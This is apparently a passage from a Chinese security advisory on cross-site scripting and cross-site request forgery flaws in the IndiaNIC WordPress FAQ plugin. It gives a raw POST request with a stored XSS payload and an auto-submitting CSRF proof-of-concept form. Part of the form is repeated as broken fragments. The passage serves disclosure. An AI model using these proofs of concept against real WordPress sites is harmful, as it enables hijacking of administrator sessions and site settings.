WordPress FAQs Manager 插件跨站脚本和跨站请求伪造漏(2)


 ####################################################################
 #### Request from Ask Question area (XSS in question parameter) ####
 ####################################################################
 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Host: 127.0.0.1:9001
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: ?p=11
 Content-Length: 143
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.

#######################################################################
 -->
    <title>
        #####################################################
        ############## IndiaNIC FAQ 1.0 CSRF ################
        #####################################################
    </title>
 <body>

<!-- replace "http://www.example.com/wordpress" -->
    <form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" value="inic_faq_settings" />
    <input type="hidden" value="m3tamantra@127.0.0.1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="lalalalalalalalalalalalal" />
    <input type="hidden" value="babaaaaaammmmmmmm" />
    <input type="hidden" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

</body>
 </html>/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" value="inic_faq_settings" />
    <input type="hidden" value="m3tamantra@127.0.0.1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="lalalalalalalalalalalalal" />
    <input type="hidden" value="babaaaaaammmmmmmm" />
    <input type="hidden" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

</body>
 </html>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyyjps.html